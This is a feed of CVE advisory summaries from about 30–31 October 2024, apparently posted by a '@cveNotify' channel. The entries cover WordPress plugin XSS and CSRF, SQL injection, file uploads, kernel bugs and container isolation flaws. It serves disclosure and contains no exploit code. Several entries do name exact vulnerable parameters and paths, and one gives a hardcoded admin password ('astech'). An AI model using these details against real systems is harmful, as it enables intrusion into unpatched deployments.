🚨 CVE-2024-9434The WPGlobus Translate Options plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.0. This is due to missing or incorrect nonce validation on the on__translate_options_page() function. This makes it possible for unauthenticated attackers to inject malicious web scripts and update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-10-31 07:37:24 |
🚨 CVE-2024-9165The Gift Cards (Gift Vouchers and Packages) (WooCommerce Supported) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 4.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.🎖@cveNotify |
|
| 2024-10-31 06:37:24 |
🚨 CVE-2024-10392The AI Power: Complete AI Pack plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'handle_image_upload' function in all versions up to, and including, 1.8.89. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-10-31 05:37:25 |
🚨 CVE-2024-9341A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.🎖@cveNotify |
|
| 2024-10-31 05:37:24 |
🚨 CVE-2024-3727A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.🎖@cveNotify |
|
| 2024-10-31 04:37:27 |
🚨 CVE-2023-37607Directory Traversal in Automatic Systems SOC FL9600 FirstLane V06 lego_T04E00 allows a remote attacker to obtain sensitive information via csvServer.php?file= with a .. in the dir parameter.🎖@cveNotify |
|
| 2024-10-31 04:37:26 |
🚨 CVE-2023-37608An issue in Automatic Systems SOC FL9600 FirstLane V06 lego_T04E00 allows a remote attacker to obtain sensitive information because there is an automaticsystems super admin account with astech as its hardcoded password.🎖@cveNotify |
|
| 2024-10-31 03:37:25 |
🚨 CVE-2024-9708The Easy SVG Upload plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.🎖@cveNotify |
|
| 2024-10-31 03:37:24 |
🚨 CVE-2023-37608An issue in Automatic Systems SOC FL9600 FirstLine v.lego_T04E00 allows a remote attacker to obtain sensitive information because there is an automaticsystems super admin account with astech as its hardcoded password.🎖@cveNotify |
|
| 2024-10-31 02:37:28 |
🚨 CVE-2024-10544The Woo Manage Fraud Orders plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.1.7 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information about users contained in the exposed log files.🎖@cveNotify |
|
| 2024-10-31 02:07:47 |
🚨 CVE-2024-50472Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Martin Drapeau Amilia Store allows Stored XSS.This issue affects Amilia Store: from n/a through 2.9.8.🎖@cveNotify |
|
| 2024-10-31 01:37:40 |
🚨 CVE-2024-48307JeecgBoot v3.7.1 was discovered to contain a SQL injection vulnerability via the component /onlDragDatasetHead/getTotalData.🎖@cveNotify |
|
| 2024-10-31 01:37:39 |
🚨 CVE-2024-50471Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Checklist Trip Plan allows Stored XSS.This issue affects Trip Plan: from n/a through 1.0.10.🎖@cveNotify |
|
| 2024-10-31 01:37:38 |
🚨 CVE-2024-50470Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Themes4WP Themes4WP YouTube External Subtitles allows Stored XSS.This issue affects Themes4WP YouTube External Subtitles: from n/a through 1.0.🎖@cveNotify |
|
| 2024-10-31 01:37:34 |
🚨 CVE-2024-10447A vulnerability classified as critical was found in Project Worlds Online Time Table Generator 1.0. Affected by this vulnerability is an unknown functionality of the file /timetable/staff/staffdashboard.php?info=updateprofile. The manipulation of the argument n leads to sql injection. The attack can be launched remotely.🎖@cveNotify |
|
| 2024-10-31 01:37:33 |
🚨 CVE-2024-20526A vulnerability in the SSH server of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition for the SSH server of an affected device. This vulnerability is due to a logic error when an SSH session is established. An attacker could exploit this vulnerability by sending crafted SSH messages to an affected device. A successful exploit could allow the attacker to exhaust available SSH resources on the affected device so that new SSH connections to the device are denied, resulting in a DoS condition. Existing SSH connections to the device would continue to function normally. The device must be rebooted manually to recover. However, user traffic would not be impacted and could be managed using a remote application such as Cisco Adaptive Security Device Manager (ASDM).🎖@cveNotify |
|
| 2024-10-31 01:07:53 |
🚨 CVE-2024-50613libsndfile through 1.2.2 has a reachable assertion, that may lead to application exit, in mpeg_l3_encode.c mpeg_l3_encoder_close.🎖@cveNotify |
|
| 2024-10-31 00:37:32 |
🚨 CVE-2024-50489Authentication Bypass Using an Alternate Path or Channel vulnerability in Realty Workstation allows Authentication Bypass.This issue affects Realty Workstation: from n/a through 1.0.45.🎖@cveNotify |
|
| 2024-10-31 00:37:25 |
🚨 CVE-2024-10440The eHDR CTMS from Sunnet has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL command to read, modify, and delete database contents.🎖@cveNotify |
|
| 2024-10-31 00:37:24 |
🚨 CVE-2024-48427A SQL injection vulnerability in Sourcecodester Packers and Movers Management System v1.0 allows remote authenticated users to execute arbitrary SQL commands via the id parameter in /mpms/admin/?page=services/manage_service&id🎖@cveNotify |
|
| 2024-10-31 00:08:04 |
🚨 CVE-2024-10374The WP-Members Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpmem_loginout shortcode in all versions up to, and including, 3.4.9.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-10-31 00:08:03 |
🚨 CVE-2024-47035In vring_init of external/headers/include/virtio/virtio_ring.h, there is a possible out of bounds write due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-10-30 23:37:25 |
🚨 CVE-2024-9675A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.🎖@cveNotify |
|
| 2024-10-30 23:37:24 |
🚨 CVE-2024-9355A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum. It is also possible to force a derived key to be all zeros instead of an unpredictable value. This may have follow-on implications for the Go TLS stack.🎖@cveNotify |
|
| 2024-10-30 22:07:25 |
🚨 CVE-2021-47615In the Linux kernel, the following vulnerability has been resolved:RDMA/mlx5: Fix releasing unallocated memory in dereg MR flowFor the case of IB_MR_TYPE_DM the mr does doesn't have a umem, even thoughit is a user MR. This causes function mlx5_free_priv_descs() to think thatit is a kernel MR, leading to wrongly accessing mr->descs that will getwrong values in the union which leads to attempt to release resources thatwere not allocated in the first place.For example: DMA-API: mlx5_core 0000:08:00.1: device driver tries to free DMA memory it has not allocated [device address=0x0000000000000000] [size=0 bytes] WARNING: CPU: 8 PID: 1021 at kernel/dma/debug.c:961 check_unmap+0x54f/0x8b0 RIP: 0010:check_unmap+0x54f/0x8b0 Call Trace: debug_dma_unmap_page+0x57/0x60 mlx5_free_priv_descs+0x57/0x70 [mlx5_ib] mlx5_ib_dereg_mr+0x1fb/0x3d0 [mlx5_ib] ib_dereg_mr_user+0x60/0x140 [ib_core] uverbs_destroy_uobject+0x59/0x210 [ib_uverbs] uobj_destroy+0x3f/0x80 [ib_uverbs] ib_uverbs_cmd_verbs+0x435/0xd10 [ib_uverbs] ? uverbs_finalize_object+0x50/0x50 [ib_uverbs] ? lock_acquire+0xc4/0x2e0 ? lock_acquired+0x12/0x380 ? lock_acquire+0xc4/0x2e0 ? lock_acquire+0xc4/0x2e0 ? ib_uverbs_ioctl+0x7c/0x140 [ib_uverbs] ? lock_release+0x28a/0x400 ib_uverbs_ioctl+0xc0/0x140 [ib_uverbs] ? ib_uverbs_ioctl+0x7c/0x140 [ib_uverbs] __x64_sys_ioctl+0x7f/0xb0 do_syscall_64+0x38/0x90Fix it by reorganizing the dereg flow and mlx5_ib_mr structure: - Move the ib_umem field into the user MRs structure in the union as it's applicable only there. - Function mlx5_ib_dereg_mr() will now call mlx5_free_priv_descs() only in case there isn't udata, which indicates that this isn't a user MR.🎖@cveNotify |
|
| 2024-10-30 22:07:24 |
🚨 CVE-2021-47613In the Linux kernel, the following vulnerability has been resolved:i2c: virtio: fix completion handlingThe driver currently assumes that the notify callback is only receivedwhen the device is done with all the queued buffers.However, this is not true, since the notify callback could be calledwithout any of the queued buffers being completed (for example, withvirtio-pci and shared interrupts) or with only some of the buffers beingcompleted (since the driver makes them available to the device inmultiple separate virtqueue_add_sgs() calls).This can lead to incorrect data on the I2C bus or memory corruption inthe guest if the device operates on buffers which are have been freed bythe driver. (The WARN_ON in the driver is also triggered.) BUG kmalloc-128 (Tainted: G W ): Poison overwritten First byte 0x0 instead of 0x6b Allocated in i2cdev_ioctl_rdwr+0x9d/0x1de age=243 cpu=0 pid=28 memdup_user+0x2e/0xbd i2cdev_ioctl_rdwr+0x9d/0x1de i2cdev_ioctl+0x247/0x2ed vfs_ioctl+0x21/0x30 sys_ioctl+0xb18/0xb41 Freed in i2cdev_ioctl_rdwr+0x1bb/0x1de age=68 cpu=0 pid=28 kfree+0x1bd/0x1cc i2cdev_ioctl_rdwr+0x1bb/0x1de i2cdev_ioctl+0x247/0x2ed vfs_ioctl+0x21/0x30 sys_ioctl+0xb18/0xb41Fix this by calling virtio_get_buf() from the notify handler like othervirtio drivers and by actually waiting for all the buffers to becompleted.🎖@cveNotify |
|
| 2024-10-30 21:37:25 |
🚨 CVE-2024-22025A vulnerability in Node.js has been identified, allowing for a Denial of Service (DoS) attack through resource exhaustion when using the fetch() function to retrieve content from an untrusted URL.The vulnerability stems from the fact that the fetch() function in Node.js always decodes Brotli, making it possible for an attacker to cause resource exhaustion when fetching content from an untrusted URL.An attacker controlling the URL passed into fetch() can exploit this vulnerability to exhaust memory, potentially leading to process termination, depending on the system configuration.🎖@cveNotify |
|
| 2024-10-30 21:37:24 |
🚨 CVE-2024-23850In btrfs_get_root_ref in fs/btrfs/disk-io.c in the Linux kernel through 6.7.1, there can be an assertion failure and crash because a subvolume can be read out too soon after its root item is inserted upon subvolume creation.🎖@cveNotify |
|
| 2024-10-30 21:07:32 |
🚨 CVE-2021-4452The Google Language Translator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via multiple parameters in versions up to, and including, 6.0.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. Specifically affects users with older browsers that lack proper URL encoding support.🎖@cveNotify |
|
| 2024-10-30 21:07:26 |
🚨 CVE-2020-36842The Migration, Backup, Staging – WPvivid plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the wpvivid_upload_import_files and wpvivid_upload_files AJAX actions that allows low-level authenticated attackers to upload zip files that can be subsequently extracted. This affects versions up to, and including 0.9.35.🎖@cveNotify |
|
| 2024-10-30 21:07:25 |
🚨 CVE-2017-20193The Product Vendors is vulnerable to Reflected Cross-Site Scripting via the 'vendor_description' parameter in versions up to, and including, 2.0.35 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-10-30 21:07:24 |
🚨 CVE-2024-47171Agnai is an artificial-intelligence-agnostic multi-user, mult-bot roleplaying chat system. A vulnerability in versions prior to 1.0.330 permits attackers to upload image files at attacker-chosen location on the server. This issue can lead to image file uploads to unauthorized or unintended directories, including overwriting of existing images which may be used for defacement. This does not affect `agnai.chat`, installations using S3-compatible storage, or self-hosting that is not publicly exposed. Version 1.0.330 fixes this vulnerability.🎖@cveNotify |
|
| 2024-10-30 20:37:30 |
🚨 CVE-2024-26581In the Linux kernel, the following vulnerability has been resolved:netfilter: nft_set_rbtree: skip end interval element from gcrbtree lazy gc on insert might collect an end interval element that hasbeen just added in this transactions, skip end interval elements thatare not yet active.🎖@cveNotify |
|
| 2024-10-30 20:37:26 |
🚨 CVE-2024-25728ExpressVPN before 12.73.0 on Windows, when split tunneling is used, sends DNS requests according to the Windows configuration (e.g., sends them to DNS servers operated by the user's ISP instead of to the ExpressVPN DNS servers), which may allow remote attackers to obtain sensitive information about websites visited by VPN users.🎖@cveNotify |
|
| 2024-10-30 20:37:25 |
🚨 CVE-2023-31824An issue found in DERICIA Co. Ltd, DELICIA v.13.6.1 allows a remote attacker to gain access to sensitive information via the channel access token in the miniapp DELICIA function.🎖@cveNotify |
|
| 2024-10-30 19:37:25 |
🚨 CVE-2024-23248The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.4. Processing a file may lead to a denial-of-service or potentially disclose memory contents.🎖@cveNotify |
|
| 2024-10-30 19:37:24 |
🚨 CVE-2023-38198acme.sh before 3.0.6 runs arbitrary commands from a remote server via eval, as exploited in the wild in June 2023.🎖@cveNotify |
|
| 2024-10-30 19:07:37 |
🚨 CVE-2024-50311A denial of service (DoS) vulnerability was found in OpenShift. This flaw allows attackers to exploit the GraphQL batching functionality. The vulnerability arises when multiple queries can be sent within a single request, enabling an attacker to submit a request containing thousands of aliases in one query. This issue causes excessive resource consumption, leading to application unavailability for legitimate users.🎖@cveNotify |
|
| 2024-10-30 19:07:30 |
🚨 CVE-2024-10033A vulnerability was found in aap-gateway. A Cross-site Scripting (XSS) vulnerability exists in the gateway component. This flaw allows a malicious user to perform actions that impact users by using the "?next=" in a URL, which can lead to redirecting, injecting malicious script, stealing sessions and data.🎖@cveNotify |
|
| 2024-10-30 19:07:29 |
🚨 CVE-2024-0568CWE-287: Improper Authentication vulnerability exists that could cause unauthorized tamperingof device configuration over NFC communication.🎖@cveNotify |
|
| 2024-10-30 18:37:38 |
🚨 CVE-2024-47063Computer Vision Annotation Tool (CVAT) is an interactive video and image annotation tool for computer vision. If a malicious CVAT user with permissions to either create a task, or edit an existing task can trick another logged-in user into visiting a maliciously-constructed URL, they can initiate any API calls on that user's behalf. This gives the attacker temporary access to all data that the victim user has access to. Upgrade to CVAT 2.19.0 or a later version to fix this issue.🎖@cveNotify |
|
| 2024-10-30 18:37:31 |
🚨 CVE-2024-27853This issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.4. A maliciously crafted ZIP archive may bypass Gatekeeper checks.🎖@cveNotify |
|
| 2024-10-30 18:37:30 |
🚨 CVE-2024-30112HCL Connections is vulnerable to a cross-site scripting attack where an attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user which leads to executing malicious script code. This may let the attacker steal cookie-based authentication credentials and comprise user's account then launch other attacks.🎖@cveNotify |
|
| 2024-10-30 18:37:26 |
🚨 CVE-2024-30807An issue was discovered in Bento4 v1.6.0-641-2-g1529b83. There is a heap-use-after-free in AP4_UnknownAtom::~AP4_UnknownAtom at Ap4Atom.cpp, leading to a Denial of Service (DoS), as demonstrated by mp42ts.🎖@cveNotify |
|
| 2024-10-30 18:37:25 |
🚨 CVE-2024-21722The MFA management features did not properly terminate existing user sessions when a user's MFA methods have been modified.🎖@cveNotify |
|
| 2024-10-30 18:37:24 |
🚨 CVE-2023-38379The web interface on the RIGOL MSO5000 digital oscilloscope with firmware 00.01.03.00.03 allows remote attackers to change the admin password via a zero-length pass0 to the webcontrol changepwd.cgi application, i.e., the entered password only needs to match the first zero characters of the saved password.🎖@cveNotify |
|
| 2024-10-30 18:07:25 |
🚨 CVE-2021-4450The Post Grid plugin for WordPress is vulnerable to blind SQL Injection via post metadata in versions up to, and including, 2.1.12 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with contributor-level permissions and above to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-10-30 18:07:24 |
🚨 CVE-2021-4449The ZoomSounds plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'savepng.php' file in versions up to, and including, 5.96. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-10-30 17:37:24 |
🚨 CVE-2024-31064Cross Site Scripting vulnerability in Insurance Mangement System v.1.0.0 and before allows a remote attacker to execute arbitrary code via the First Name input field.🎖@cveNotify |
|
| 2024-10-30 17:07:40 |
🚨 CVE-2024-10369A vulnerability was found in Codezips Sales Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /addcustcom.php. The manipulation of the argument refno leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-30 17:07:39 |
🚨 CVE-2022-4971The Sassy Social Share plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'urls' parameter called via the 'heateor_sss_sharing_count' AJAX action in versions up to, and including, 3.3.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-10-30 16:37:36 |
🚨 CVE-2022-38176An issue was discovered in YSoft SAFEQ 6 before 6.0.72. Incorrect privileges were configured as part of the installer package for the Client V3 services, allowing for local user privilege escalation by overwriting the executable file via an alternative data stream. NOTE: this is not the same as CVE-2021-31859.🎖@cveNotify |
|
| 2024-10-30 16:08:02 |
🚨 CVE-2022-23861Multiple Stored Cross-Site Scripting vulnerabilities were discovered in Y Soft SAFEQ 6 Build 53. Multiple fields in the YSoft SafeQ web application can be used to inject malicious inputs that, due to a lack of output sanitization, result in the execution of arbitrary JS code. These fields can be leveraged to perform XSS attacks on legitimate users accessing the SafeQ web interface.🎖@cveNotify |
|
| 2024-10-30 16:08:01 |
🚨 CVE-2022-4973WordPress Core, in versions up to 6.0.2, is vulnerable to Authenticated Stored Cross-Site Scripting that can be exploited by users with access to the WordPress post and page editor, typically consisting of Authors, Contributors, and Editors making it possible to inject arbitrary web scripts into posts and pages that execute if the the_meta(); function is called on that page.🎖@cveNotify |
|
| 2024-10-30 15:37:40 |
🚨 CVE-2024-22455Dell Mobility - E-Lab Navigator, version(s) 3.1.9, 3.2.0, contain(s) an Authorization Bypass Through User-Controlled Key vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to Launch of phishing attacks.🎖@cveNotify |
|
| 2024-10-30 15:37:39 |
🚨 CVE-2023-38409An issue was discovered in set_con2fb_map in drivers/video/fbdev/core/fbcon.c in the Linux kernel before 6.2.12. Because an assignment occurs only for the first vc, the fbcon_registered_fb and fbcon_display arrays can be desynchronized in fbcon_mode_deleted (the con2fb_map points at the old fb_info).🎖@cveNotify |
|
| 2024-10-30 15:08:21 |
🚨 CVE-2024-48963The package Snyk CLI before 1.1294.0 is vulnerable to Code Injection when scanning an untrusted PHP project. The vulnerability can be triggered if Snyk test is run inside the untrusted project due to the improper handling of the current working directory name. Snyk recommends only scanning trusted projects.🎖@cveNotify |
|
| 2024-10-30 15:08:20 |
🚨 CVE-2024-10290A vulnerability, which was classified as problematic, was found in ZZCMS 2023. This affects an unknown part of the file 3/qq-connect2.0/API/com/inc.php. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-30 15:08:17 |
🚨 CVE-2024-8980The Script Console in Liferay Portal 7.0.0 through 7.4.3.101, and Liferay DXP 2023.Q3.1 through 2023.Q3.4, 7.4 GA through update 92, 7.3 GA through update 35, 7.2 GA through fix pack 20, 7.1 GA through fix pack 28, 7.0 GA through fix pack 102 and 6.2 GA through fix pack 173 does not sufficiently protect against Cross-Site Request Forgery (CSRF) attacks, which allows remote attackers to execute arbitrary Groovy script via a crafted URL or a XSS vulnerability.🎖@cveNotify |
|
| 2024-10-30 15:08:16 |
🚨 CVE-2024-26273Cross-site request forgery (CSRF) vulnerability in the content page editor in Liferay Portal 7.4.0 through 7.4.3.103, and Liferay DXP 2023.Q4.0 through 2023.Q4.2, 2023.Q3.1 through 2023.Q3.5, 7.4 GA through update 92 and 7.3 update 29 through update 35 allows remote attackers to (1) change user passwords, (2) shut down the server, (3) execute arbitrary code in the scripting console, (4) and perform other administrative actions via the _com_liferay_commerce_catalog_web_internal_portlet_CommerceCatalogsPortlet_redirect parameter.🎖@cveNotify |
|
| 2024-10-30 15:08:15 |
🚨 CVE-2024-26271Cross-site request forgery (CSRF) vulnerability in the My Account widget in Liferay Portal 7.4.3.75 through 7.4.3.111, and Liferay DXP 2023.Q4.0 through 2023.Q4.2, 2023.Q3.1 through 2023.Q3.5, 7.4 update 75 through update 92 and 7.3 update 32 through update 36 allows remote attackers to (1) change user passwords, (2) shut down the server, (3) execute arbitrary code in the scripting console, (4) and perform other administrative actions via the _com_liferay_my_account_web_portlet_MyAccountPortlet_backURL parameter.🎖@cveNotify |
|
| 2024-10-30 14:37:31 |
🚨 CVE-2024-25802SKINsoft S-Museum 7.02.3 allows Unrestricted File Upload via the Add Media function. Unlike in CVE-2024-25801, the attack payload is the file content.🎖@cveNotify |
|
| 2024-10-30 14:37:30 |
🚨 CVE-2022-45169An issue was discovered in LIVEBOX Collaboration vDesk through v031. A URL Redirection to an Untrusted Site (Open Redirect) can occur under the /api/v1/notification/createnotification endpoint, allowing an authenticated user to send an arbitrary push notification to any other user of the system. This push notification can include an (invisible) clickable link.🎖@cveNotify |
|
| 2024-10-30 14:37:26 |
🚨 CVE-2022-48623The Cpanel::JSON::XS package before 4.33 for Perl performs out-of-bounds accesses in a way that allows attackers to obtain sensitive information or cause a denial of service.🎖@cveNotify |
|
| 2024-10-30 14:37:25 |
🚨 CVE-2022-25514stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function ttUSHORT() at stb_truetype.h. NOTE: Third party has disputed stating that the source code has also a disclaimer that it should only be used with trusted input.🎖@cveNotify |
|
| 2024-10-30 14:08:14 |
🚨 CVE-2024-10293A vulnerability was found in ZZCMS 2023. It has been classified as critical. Affected is the function Ebak_SetGotoPak of the file 3/Ebbak5.1/upload/class/functions.php. The manipulation of the argument file leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-30 14:08:08 |
🚨 CVE-2024-10292A vulnerability was found in ZZCMS 2023 and classified as critical. This issue affects some unknown processing of the file 3/Ebak5.1/upload/ChangeTable.php. The manipulation of the argument savefilename leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-30 14:08:07 |
🚨 CVE-2024-7824Access of Resource Using Incompatible Type ('Type Confusion') vulnerability in Webroot SecureAnywhere - Web Shield on Windows, ARM, 64 bit, 32 bit (wrUrl.Dll modules) allows Functionality Misuse.This issue affects SecureAnywhere - Web Shield: before 2.1.2.3.🎖@cveNotify |
|
| 2024-10-30 14:08:06 |
🚨 CVE-2022-4968netplan leaks the private key of wireguard to local users. Versions after 1.0 are not affected.🎖@cveNotify |
|
| 2024-10-30 13:37:25 |
🚨 CVE-2024-51304In Draytek Vigor3900 1.5.1.3, attackers can inject malicious commands into mainfunction.cgi and execute arbitrary commands by calling the ldap_search_dn function.🎖@cveNotify |
|
| 2024-10-30 13:37:24 |
🚨 CVE-2024-10291A vulnerability has been found in ZZCMS 2023 and classified as critical. This vulnerability affects the function Ebak_DoExecSQL/Ebak_DotranExecutSQL of the file 3/Ebak5.1/upload/phome.php. The manipulation of the argument phome leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-30 13:07:26 |
🚨 CVE-2024-10348A vulnerability was found in SourceCodester Best House Rental Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /index.php?page=tenants of the component Manage Tenant Details. The manipulation of the argument Last Name/First Name/Middle Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory only shows the field "Last Name" to be affected. Other fields might be affected as well.🎖@cveNotify |
|
| 2024-10-30 12:37:48 |
🚨 CVE-2024-10525In Eclipse Mosquitto, from version 1.3.2 through 2.0.18, if a malicious broker sends a crafted SUBACK packet with no reason codes, a client using libmosquitto may make out of bounds memory access when acting in its on_subscribe callback. This affects the mosquitto_sub and mosquitto_rr clients.🎖@cveNotify |
|
| 2024-10-30 11:37:25 |
🚨 CVE-2024-9388The Black Widgets For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.3.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.🎖@cveNotify |
|
| 2024-10-30 11:37:24 |
🚨 CVE-2024-6508An insufficient entropy vulnerability was found in the Openshift Console. In the authorization code type and implicit grant type, the OAuth2 protocol is vulnerable to a Cross-Site Request Forgery (CSRF) attack if the state parameter is used inefficiently. This flaw allows logging into the victim’s current application account using a third-party account without any restrictions.🎖@cveNotify |
|
| 2024-10-30 09:37:32 |
🚨 CVE-2024-9676A vulnerability was found in Podman, Buildah, and CRI-O. A symlink traversal vulnerability in the containers/storage library can cause Podman, Buildah, and CRI-O to hang and result in a denial of service via OOM kill when running a malicious image using an automatically assigned user namespace (`--userns=auto` in Podman and Buildah). The containers/storage library will read /etc/passwd inside the container, but does not properly validate if that file is a symlink, which can be used to cause the library to read an arbitrary file on the host.🎖@cveNotify |
|
| 2024-10-30 08:37:32 |
🚨 CVE-2024-50508Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Chetan Khandla Woocommerce Product Design allows Path Traversal.This issue affects Woocommerce Product Design: from n/a through 1.0.0.🎖@cveNotify |
|
| 2024-10-30 08:37:25 |
🚨 CVE-2024-50503Authentication Bypass Using an Alternate Path or Channel vulnerability in Deryck Oñate User Toolkit allows Authentication Bypass.This issue affects User Toolkit: from n/a through 1.2.3.🎖@cveNotify |
|
| 2024-10-30 08:37:24 |
🚨 CVE-2024-35593An arbitrary file upload vulnerability in the File preview function of Raingad IM v4.1.4 allows attackers to execute arbitrary code via uploading a crafted PDF file.🎖@cveNotify |
|
| 2024-10-30 07:37:25 |
🚨 CVE-2024-10108The WPAdverts – Classifieds Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's adverts_add shortcode in all versions up to, and including, 2.1.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-10-30 07:37:24 |
🚨 CVE-2024-9675A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.🎖@cveNotify |
|
| 2024-10-30 06:37:25 |
🚨 CVE-2024-8871The Pricing Tables WordPress Plugin – Easy Pricing Tables plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.2.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-10-30 06:37:24 |
🚨 CVE-2024-10399The Download Monitor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_search_users function in all versions up to, and including, 5.0.13. This makes it possible for authenticated attackers, with Subscriber-level access and above, to obtain usernames and emails of site users.🎖@cveNotify |
|
| 2024-10-30 03:37:32 |
🚨 CVE-2024-8627The Ultimate TinyMCE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'field' shortcode in all versions up to, and including, 5.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-10-30 03:37:25 |
🚨 CVE-2023-5816The Code Explorer plugin for WordPress is vulnerable to arbitrary external file reading in all versions up to, and including, 1.4.5. This is due to the fact that the plugin does not restrict accessing files to those outside of the WordPress instance, though the intention of the plugin is to only access WordPress related files. This makes it possible for authenticated attackers, with administrator-level access, to read files outside of the WordPress instance.🎖@cveNotify |
|
| 2024-10-30 03:37:24 |
🚨 CVE-2024-10033A vulnerability was found in aap-gateway. A Cross-site Scripting (XSS) vulnerability exists in the gateway component. This flaw allows a malicious user to perform actions that impact users by using the "?next=" in a URL, which can lead to redirecting, injecting malicious script, stealing sessions and data.🎖@cveNotify |
|
| 2024-10-30 02:37:24 |
🚨 CVE-2024-10505A vulnerability was found in wuzhicms 4.1.0. It has been classified as critical. Affected is the function add/edit of the file www/coreframe/app/content/admin/block.php. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Initially two separate issues were created by the researcher for the different function calls. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-10-30 01:37:25 |
